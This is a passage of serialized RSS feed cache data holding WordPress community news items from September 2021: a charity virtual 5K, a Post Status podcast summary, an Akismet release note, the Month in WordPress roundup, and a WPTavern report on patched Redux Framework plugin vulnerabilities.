swim the 5K any time between October 1-31. The requirements are fairly loose in that you can use any exercise app to track your run if you want. Participants are also encouraged to share a selfie, a screenshot of your route, and write a blog post that includes the&nbsp;#wwwp5k&nbsp;tag. Automattic will use the hashtag to include pictures on the official race site.</p>\n\n\n\n<p>Throughout the pandemic, much of the social running industry has gone online and virtual races have become more common. Although they don&rsquo;t carry the same energy as in-person races, virtual races help friends keep setting fitness goals and encourage each other through online challenges. Joining in the <a href=\"https://wwwp5k.run/\">Worldwide WordPress 5K</a> is a great way to connect with friends around the world for an offline challenge that benefits your health.</p>\n\n\n\n<p>There is plenty of time to start training to reach a goal ahead of October and lots of resources available for <a href=\"https://www.womenshealthmag.com/fitness/a19995645/5k-training-plan/\">running your first 5K</a>. If all other motivations fail, maybe Wapuu can get you off the couch. The lack of in-person WordCamps has left some people hankering for new WordPress swag, and the 5K wapuu is ready to deliver. Participants can choose from a wide array of official gear, including hoodies, t-shirts, water bottles, tank tops, pins, socks, and more. Those who prefer not to run but still want to take part in the charitable event can give directly through the&nbsp;<a rel=\"noreferrer noopener\" href=\"https://www.globalgiving.org/automattic/\" target=\"_blank\">donation page</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 04 Sep 2021 02:04:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"Post Status: Post Status Excerpt (No. 23) — Farewell To Andrea — but not the Classic Editor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=85894\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://poststatus.com/excerpt/23/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3896:\"<h2 id=\"h-new-hires-to-post-status-and-an-acquihire-for-automattic\">New hires to Post Status and an acquihire for Automattic.</h2>\n\n\n\n<p class=\"has-drop-cap\">In this episode, David and Cory talk about recent news from all corners of the WordPress community. First, they share how they will miss <strong>Andrea Middleton</strong> — who is taking a great new opportunity at <strong>Reddit</strong> after 10 years of full-time work on the WordPress open source project. Next, they talk about why keeping the <strong>Classic Editor</strong> plugin officially supported makes sense, and how the <strong>Frontity</strong> acquisition by <strong>Automattic</strong> can be viewed as an acquihire to advance <strong>Gutenberg</strong>&#8216;s development.</p>\n\n\n\n<p><strong>Also covered in this episode: </strong>Cory and David welcome <strong>Jonathan Wold</strong> to the Post Status team.</p>\n\n\n\n\n\n\n\n<p class=\"has-background\">Every week Post Status Excerpt will brief you on important WordPress news — in about 15 minutes or less! Learn what\'s new in WordPress in a flash. <img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/26a1.png\" alt=\"⚡\" class=\"wp-smiley\" /><br /><br /><a href=\"https://poststatus.com/category/post-status-podcasts/\" target=\"_blank\" rel=\"noreferrer noopener\">Browse our archives</a>, and don’t forget to subscribe via <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\" target=\"_blank\" rel=\"noreferrer noopener\">iTunes</a>, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\" target=\"_blank\" rel=\"noreferrer noopener\">Google Podcasts</a>, <a href=\"https://www.youtube.com/c/PostStatus\" target=\"_blank\" rel=\"noreferrer noopener\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\" target=\"_blank\" rel=\"noreferrer noopener\">Stitcher</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\" target=\"_blank\" rel=\"noreferrer noopener\">Simplecast</a>, or <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f3a7.png\" alt=\"?\" class=\"wp-smiley\" /></p>\n\n\n\n<h3 id=\"h-mentioned-in-the-show\"><img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f517.png\" alt=\"?\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul><li><a href=\"http://kolbe.com\"></a><a href=\"https://andreamiddleton.blog/2021/08/30/thanks-for-a-great-10-years-wordpress/\">Thanks for a great 10 years,&nbsp;WordPress!</a></li><li><a href=\"https://twitter.com/sirjonathan\">Jonathan Wold (Twitter)</a></li><li><a href=\"https://wordpress.org/news/2021/08/an-update-on-the-classic-editor-plugin/\">An Update on the Classic Editor Plugin</a></li><li><a href=\"https://ma.tt/2021/08/frontity-to-join-automattic/\">Frontity to Join&nbsp;Automattic</a></li><li><a href=\"https://frontity.org/blog/frontity-is-joining-automattic/\">Frontity is joining Automattic</a></li><li><a href=\"https://twitter.com/dimensionmedia\" target=\"_blank\" rel=\"noreferrer noopener\">David Bisset (Twitter)</a></li><li><a href=\"https://twitter.com/corymiller303\" target=\"_blank\" rel=\"noreferrer noopener\">Cory Miller (Twitter)</a></li><li><a href=\"https://twitter.com/post_status\" target=\"_blank\" rel=\"noreferrer noopener\">Post Status (Twitter)</a></li></ul>\n\n\n\n<h3><img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f64f.png\" alt=\"?\" class=\"wp-smiley\" /> Sponsor: <a href=\"https://poststat.us/sandhills\" target=\"_blank\" rel=\"noreferrer noopener sponsored nofollow\">Gravity Forms</a></h3>\n\n\n\n<p><strong>Gravity Forms</strong> is the easiest and most trusted advanced forms solution for your WordPress website. Packed with time-saving tools and features, <strong>Gravity Forms</strong> is the only WordPress form management plugin you will ever need. Stop losing valuable leads and grow your business with Gravity.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Sep 2021 17:45:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"David Bisset\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"Akismet: Version 4.1.12 of the Akismet WordPress Plugin is Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=2123\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://blog.akismet.com/2021/09/03/version-4-1-12-of-the-akismet-wordpress-plugin-is-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:637:\"<p>Version 4.1.12 of <a href=\"http://wordpress.org/plugins/akismet/\">the Akismet plugin for WordPress</a> is now available. It contains the following changes:</p>\n<ul>\n<li>Fixed a bug that was causing &#8220;Use of undefined constant&#8221; PHP notices.</li>\n<li>Improved styling of alert notices to better match the current WordPress look and feel.</li>\n</ul>\n<p>To upgrade, visit the Updates page of your WordPress dashboard and follow the instructions. If you need to download the plugin zip file directly, links to all versions are available in <a href=\"http://wordpress.org/plugins/akismet/\">the WordPress plugins directory</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Sep 2021 16:57:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Christopher Finke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"WordPress.org blog: The Month in WordPress: August 2021\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11176\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://wordpress.org/news/2021/09/the-month-in-wordpress-august-2021/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:15529:\"<blockquote class=\"wp-block-quote\"><p>I really believe in WordPress’ mission to democratize publishing. And I, for one, will never stop learning about what gives people more access to the software, and what makes the software more usable, and especially how we can combine usability with accessibility in a way that puts form and function on a level playing field.<br /></p></blockquote>\n\n\n\n<p>That was <a href=\"https://profiles.wordpress.org/chanthaboune/\">Josepha Haden</a> on the “<a href=\"https://wordpress.org/news/2021/08/episode-14-the-art-and-science-of-accessibility/\">The Art and Science of Accessibility</a>” episode of the <a href=\"https://wordpress.org/news/podcast/\">WP Briefing Podcast</a>, talking about accessibility and exploring how it applies to the WordPress open source software. You will find that many of our updates from August 2021 tie in closely with the core principles of access, accessibility, and usability. Read on to find out more!</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Join the 2021 WordPress Translation Day Celebrations in September</h2>\n\n\n\n<a href=\"https://wptranslationday.org/\" target=\"_blank\" rel=\"noopener\"><img width=\"632\" height=\"395\" src=\"https://i0.wp.com/wordpress.org/news/files/2021/09/image.jpeg?resize=632%2C395&ssl=1\" alt=\"WordPress Translation Day 2021 September 1 - 30, 2021\" class=\"wp-image-11177\" /></a>\n\n\n\n<p>Join WordPress contributors around the world on <a href=\"https://wptranslationday.org/\">WordPress Translation Day celebrations</a> for the entire month of September! The sixth edition of #WPTranslationDay &#8211; which is a cross-team effort led by the Polyglots and Marketing Teams, has a host of fun programs aimed at helping WordPress speak all languages of the world. Want to join the fun? Here’s how.</p>\n\n\n\n<ul><li><a href=\"https://wptranslationday.org/wptd-2021/local-events/\">Join your local translation event</a> and collaborate on efforts to translate WordPress! Can’t find a <a href=\"https://wptranslationday.org/wptd-2021/local-events/\">local event in your area</a>? Why don’t you <a href=\"https://make.wordpress.org/polyglots/2021/08/11/call-for-local-event-organizers-wordpress-translation-day-2021/\">organize one on your own</a>?</li><li>Join <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">one of our global events</a> from September 17-30!<em> </em>We have exciting sessions on <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">polyglots tools and open source translation communities</a>, to name a few.</li><li>You can help<a href=\"https://translate.wordpress.org/\"> translate WordPress to your own language</a>, in your own time, this month! <a href=\"https://make.wordpress.org/polyglots/handbook/translating/first-steps/\">Here’s how!</a></li><li>Share what you are translating using the #WPTranslationDay hashtag on social media, to build excitement around the event! Don’t forget to amplify posts about the event on <a href=\"https://www.facebook.com/WPTranslationDay/\">Facebook</a>, <a href=\"https://twitter.com/TranslateWP\">Twitter</a>, <a href=\"https://www.instagram.com/wptranslationday/\">Instagram</a>, and <a href=\"https://www.linkedin.com/company/wptranslationday/\">LinkedIn</a>!</li></ul>\n\n\n\n<p>&nbsp;For more information, check out <a href=\"https://wptranslationday.org/\">the translation day website</a> and the <a href=\"https://make.wordpress.org/polylgots/tag/wptranslationday/\">Polyglots blog</a>.</p>\n\n\n\n<h2>WordPress Release Updates</h2>\n\n\n\n<p>The Core Team <a href=\"https://make.wordpress.org/core/2021/08/13/preliminary-road-to-5-9/\">commenced work</a> on the next major release &#8211; WordPress 5.9. The team aims to ship some cool features such as intrinsic web design to blocks, improved block patterns, navigation menus, better design tools, edit flows for block themes, and a new interface for theme.json. Check out the <a href=\"https://make.wordpress.org/core/5-9/\">WordPress 5.9 development cycle</a> to know more. This release is set to go out in December 2021. The team is also <a href=\"https://make.wordpress.org/core/2021/08/24/wordpress-5-8-x-release-team-and-5-8-1-schedule/\">working on shipping a minor release WordPress 5.8.1</a> –– its <a href=\"https://make.wordpress.org/core/2021/09/01/wordpress-5-8-1-rc-1/\">release candidate</a> is already out and the final release will launch on September 8.</p>\n\n\n\n<p>Want to contribute to WordPress core? Join the <a href=\"https://wordpress.slack.com/archives/C02RQBWTW\">#core</a> channel, follow the <a href=\"https://make.wordpress.org/core/\">Core Team blog</a>, and check out the <a href=\"https://make.wordpress.org/core/handbook/\">team handbook</a>. Don’t miss the Core Team chats on Wednesdays at <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?hour=5&min=00&sec=0\">5 AM</a> and <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?hour=20&min=00&sec=0\">8 PM</a> UTC. You can also help <a href=\"https://translate.wordpress.org/\">translate WordPress</a> to your local language &#8211; and what better time to do it, than in September, <a href=\"https://wptranslationday.org/\">during the translation month celebrations</a>? Another fun way to contribute would be to <a href=\"https://make.wordpress.org/marketing/2021/08/11/share-about-wordpress-5-8-on-social-media/\">share about WordPress 5.8 on social media</a>!</p>\n\n\n\n<h2>Say Hello to Gutenberg Versions 11.2 and 11.3</h2>\n\n\n\n<p>We launched Gutenberg <a href=\"https://make.wordpress.org/core/2021/08/05/whats-new-in-gutenberg-11-2-0-4-august/\">version 11.2</a> and <a href=\"https://make.wordpress.org/core/2021/08/18/whats-new-in-gutenberg-11-3-18-august/\">version 11.3</a> this month. <a href=\"https://make.wordpress.org/core/2021/08/05/whats-new-in-gutenberg-11-2-0-4-august/\">Version 11.2</a> adds customizing/color options to the search block, a flex layout for the group block, and a new button for creating posts as part of the publishing flow. <a href=\"https://make.wordpress.org/core/2021/08/18/whats-new-in-gutenberg-11-3-18-august/\">Version 11.3</a> offers a new dimensions panel (replacing the spacing panel) with more styling options, dimensions control for the feature image block, and significant performance improvements for block inserters.<br /></p>\n\n\n\n<p>Want to get involved in building Gutenberg? Follow <a href=\"https://make.wordpress.org/core/\">the Core Team blog</a>, contribute to <a href=\"https://github.com/WordPress/gutenberg/\">Gutenberg on GitHub</a>, and join the <a href=\"https://wordpress.slack.com/archives/C02QB2JS7\">#core-editor</a> channel in the <a href=\"https://make.wordpress.org/chat/\">Make WordPress Slack</a>. The “<a href=\"https://make.wordpress.org/core/2021/07/21/whats-next-in-gutenberg-site-editing-status-check-late-july-august-2021/\">What’s next in Gutenberg</a>” post offers more details on the latest updates.&nbsp;</p>\n\n\n\n<h2>Get Excited about WordCamp US 2021</h2>\n\n\n\n<p>The biggest WordCamp in North America &#8211; <a href=\"https://us.wordcamp.org/2021/\">WordCamp US 2021-</a> is barely a month away. <a href=\"https://us.wordcamp.org/2021/tickets/\">Get your (free) tickets</a>, if you haven’t already! The organizing team has opened up calls for <a href=\"https://us.wordcamp.org/2021/calling-all-musicians/\">musicians</a>, <a href=\"https://us.wordcamp.org/2021/call-for-contributor-stories/\">contributor stories</a>, and <a href=\"https://us.wordcamp.org/2021/call-for-media-partners/\">media partners</a>. Check out <a href=\"https://us.wordcamp.org/2021/\">the event website</a> and follow the event on <a href=\"https://twitter.com/wordcampus\">Twitter</a>, <a href=\"https://www.instagram.com/wordcampus/\">Instagram</a>, and <a href=\"https://www.facebook.com/WordCampUSA\">Facebook</a> to stay updated on all that #WCUS news.</p>\n\n\n\n<h2>Important Announcements/Updates</h2>\n\n\n\n<ul><li>Support for the Classic Editor plugin <a href=\"https://wordpress.org/news/2021/08/an-update-on-the-classic-editor-plugin/\">will be extended for a full year until 2022</a>!</li><li>The Themes Team published a <a href=\"https://make.wordpress.org/themes/2021/08/06/summary-of-the-request-for-feedback-on-requirement-changes/\">feedback summary</a> on the <a href=\"https://make.wordpress.org/themes/2021/07/20/discussion-request-for-feedback-on-requirement-changes/\">proposed requirement changes for WordPress theme review</a>, and will soon be updating the handbook and review tools. You will find more context in their <a href=\"https://make.wordpress.org/themes/2021/08/10/meeting-notes-themes-team-and-theme-authors-regarding-requirements-change/\">meeting notes</a>.</li><li>The Plugins Team <a href=\"https://make.wordpress.org/plugins/2021/08/27/inaccurate-stats-have-been-corrected/\">corrected inaccurate plugin statistics</a> in the plugin directory.</li><li>Check out the <a href=\"https://make.wordpress.org/test/2021/08/17/fse-program-theme-design-survey-results/\">results of the FSE Theme Design (theme.json) survey</a>!</li></ul>\n\n\n\n<h2>Feedback/Testing Requests from Contributor Teams</h2>\n\n\n\n<ul><li>The Testing Team is requesting testing help for a <a href=\"https://make.wordpress.org/test/2021/08/30/week-in-test-30-aug-2021/\">few tickets and patches in WordPress</a>. The team is also looking for volunteers to <a href=\"https://make.wordpress.org/test/2021/08/20/call-for-volunteeers-audit-and-update-testing-instructions-across-the-make-sites/\">audit and update Core testing instructions </a>across different Make sites.</li><li>The Community Team shared a <a href=\"https://make.wordpress.org/community/2021/09/01/proposal-centralized-global-do_action-charity-hackathons/\">proposal on planning online-only recurring global do_action charity hackathons</a>. Share your feedback by September 24.</li><li>The Training Team is also exploring the possibility of adding <a href=\"https://make.wordpress.org/training/2021/08/10/proposal-learner-achievements-on-profiles/\">learner achievements (on learn.wordpress.org) on WP Profiles</a> and is requesting feedback from the community.</li><li>Help the Marketing Team’s outreach research by filling out <a href=\"https://forms.gle/4QFhX8fcNxKAfK8y5\">this 2 question survey</a> on how you search for WordPress release information. If you have any favorite features from the latest release (WordPress 5.8) let the team know by completing this <a href=\"https://docs.google.com/forms/d/e/1FAIpQLSd_2llymf79-h5sgTiprz7Kw4Gr4cbDHh-AAdAQfiArXlHksg/viewform\">short form</a>.</li><li>Version 18.1 of WordPress for <a href=\"https://make.wordpress.org/mobile/2021/08/23/call-for-testing-wordpress-for-ios-18-1/\">iOS</a> and <a href=\"https://make.wordpress.org/mobile/2021/08/23/call-for-testing-wordpress-for-android-18-1/\">Android</a> are now available for testing!</li></ul>\n\n\n\n<h2>WordPress Event Updates</h2>\n\n\n\n<ul><li><a href=\"https://floripa.wordcamp.org/2021/\">WordCamp Florianopolis 2021</a> was held on August 11-12, 2021. The event, which sold 390 tickets, had 11 speakers and 4 sponsors. Catch the <a href=\"https://www.youtube.com/channel/UCh1CeGfuDRH-o13xh7kpgUQ\">event recap on YouTube</a>!</li><li><a href=\"https://galicia.wordcamp.org/2021/\">WordCamp Galicia 2021</a> is being held from September 30 &#8211; October 2, 2021! </li><li><a href=\"https://doaction.org/event/karnataka-2021/\">do_action Karnataka 2021</a> was held from August 7-15, 2021. Check out <a href=\"https://wordpressfoundation.org/2021/do_action-karnataka-2021-a-report/\">the recap</a>!</li><li>The Core Team organized a <a href=\"https://make.wordpress.org/core/2021/08/25/hallway-hangout-summary-compare-and-contrast-the-navigation-screens/\">hallway hangout</a> to compare the ‘experimental’ Gutenberg navigation feature with the built-in core feature. The team decided to wait until feature parity with core nav menus, to move the feature from experiments to the main plugin.</li><li>The Diverse Speakers Training group (<a href=\"https://make.wordpress.org/community/tag/wpdiversity/\">#WPDiversity</a>) of the Community Team held their first “<a href=\"https://make.wordpress.org/community/2021/09/02/report-diverse-speaker-workshops-august-2021/\">Allyship for WordPress Event Organizers</a>” workshop on August 19, 2021. The event had 13 attendees from six countries who reported a 52% increase in preparedness to help create inclusive WordPress events. <a href=\"https://make.wordpress.org/community/tag/wpdiversityworkshops/\">Stay tuned</a> for their next workshop in November!</li></ul>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Further Reading</h2>\n\n\n\n<ul><li>Don’t miss this blog post on <a href=\"https://wordpress.org/news/2021/08/widgets-in-wordpress-5-8-and-beyond/\">Widgets in WordPress 5.8 and beyond</a>!</li><li>The Full Site Editing (FSE) Outreach program wrapped up its ninth challenge –– <a href=\"https://make.wordpress.org/test/2021/08/11/fse-program-testing-call-9-handling-highered-headers/\">Handling HigherEd Headers</a>, on September 1. Keep an eye out for <a href=\"https://make.wordpress.org/test/tag/fse-outreach-program/\">test results and future testing call announcements</a>!</li><li>The Test Team is <a href=\"https://make.wordpress.org/test/2021/08/19/test-team-chat-summary-17-august-2021/\">attempting to modernize PHPUnit tests</a> for WordPress.</li><li>The Accessibility Team is testing the <a href=\"https://make.wordpress.org/accessibility/2021/08/20/accessibility-team-meeting-notes-august-20-2021/\">navigation block</a> for accessibility feedback.</li><li>The Docs Team <a href=\"https://make.wordpress.org/docs/2021/08/31/summary-of-docs-team-meeting-aug-24-2021/\">launched a new repository</a> for tracking issues with WordPress documentation: <a href=\"https://github.com/WordPress/Documentation-Issue-Tracker\">https://github.com/WordPress/Documentation-Issue-Tracker</a></li><li>The Training Team <a href=\"https://make.wordpress.org/training/2021/08/17/proposal-brand-guidelines-for-learn-wordpress-content/#comment-3130\">finalized</a> brand <a href=\"https://make.wordpress.org/training/2021/08/17/proposal-brand-guidelines-for-learn-wordpress-content/\">guidelines</a> for <a href=\"https://learn.wordpress.org\">learn.wordpress.org</a>. The team is also working on setting up <a href=\"https://make.wordpress.org/training/2021/08/12/wordpress-101-microcourses-proposal/\">Micro courses for Learn</a>.</li><li>The Openverse Team is <a href=\"https://make.wordpress.org/openverse/2021/08/16/multi-stage-docker-builds-in-the-openverse-api/\">exploring Multistage docker builds</a> as a solution to better set up waveforms for audio search results in the Openverse tool.&nbsp;</li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><em>submit it using this form</em></a><em>.&nbsp;</em></p>\n\n\n\n<p><em>The following folks contributed to August’s Month in WordPress:&nbsp; <a href=\"https://profiles.wordpress.org/evarlese/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>evarlese</a> <a href=\"https://profiles.wordpress.org/meher/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>meher</a> <em><a href=\"https://profiles.wordpress.org/nao/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>nao</a></em> <a href=\"https://profiles.wordpress.org/jillbinder/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>jillbinder</a></em> <em><a href=\"https://profiles.wordpress.org/webcommsat/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>webcommsat</a></em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Sep 2021 14:00:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Hari Shanker R\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: Extendify Patches Vulnerabilities in the Redux Framework Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122200\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:191:\"https://wptavern.com/extendify-patches-vulnerabilities-in-the-redux-framework-plugin?utm_source=rss&utm_medium=rss&utm_campaign=extendify-patches-vulnerabilities-in-the-redux-framework-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2456:\"<p>Wordfence has <a href=\"https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/\">published</a> two vulnerabilities that affect users of the Redux Framework plugin, which has more recently come to be know as the &ldquo;<a href=\"https://wordpress.org/plugins/redux-framework/\">Gutenberg Template Library &amp; Redux Framework</a>&rdquo; on WordPress.org. Extendify purchased the plugin from its creator, D&#333;vy Paukstys, in November 2020, in a deal that was not highly publicized. It is currently active on more than 1 million WordPress sites.</p>\n\n\n\n<p>Throughout most of its history, Redux has been known as a popular options framework for themes and plugins. In 2020, Paukstys <a href=\"https://wptavern.com/redux-framework-relaunches-focuses-efforts-on-gutenberg-templates\">relaunched the framework</a> with a focus on Gutenberg templates. Users can now browse more than 1,000 templates from inside the block editor.</p>\n\n\n\n<p>It is this new template-browsing feature that was found to be vulnerable in Wordfence&rsquo;s recent security report, due to a lax permissions check on the WP REST API endpoints the plugin uses to process requests in its template library. On August 3, 2021, Wordfence disclosed one high-severity vulnerability described as an <em>&ldquo;Incorrect Authorization Leading to Arbitrary Plugin Installation and Post Deletion&rdquo;</em> and a lower-severity <em>&ldquo;Unauthenticated Sensitive Information Disclosure</em>&rdquo; vulnerability to the plugin&rsquo;s owners. The report published this week describes the nature of the threat:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>One vulnerability allowed users with lower permissions, such as contributors, to install and activate arbitrary plugins and delete any post or page via the REST API. A second vulnerability allowed unauthenticated attackers to access potentially sensitive information about a site&rsquo;s configuration.</p></blockquote>\n\n\n\n<p>Extendify responded immediately and shipped a patched version (4.2.13) of the Redux Framework on August 11, 2021. At the time of publishing, more than 71% of sites using the Redux Framework plugin are running on older versions that remain vulnerable. Users are advised to update to the latest version in order to get the security patch, especially now that Wordfence has published an article showing how attackers could potentially exploit these vulnerabilities. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Sep 2021 03:50:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah 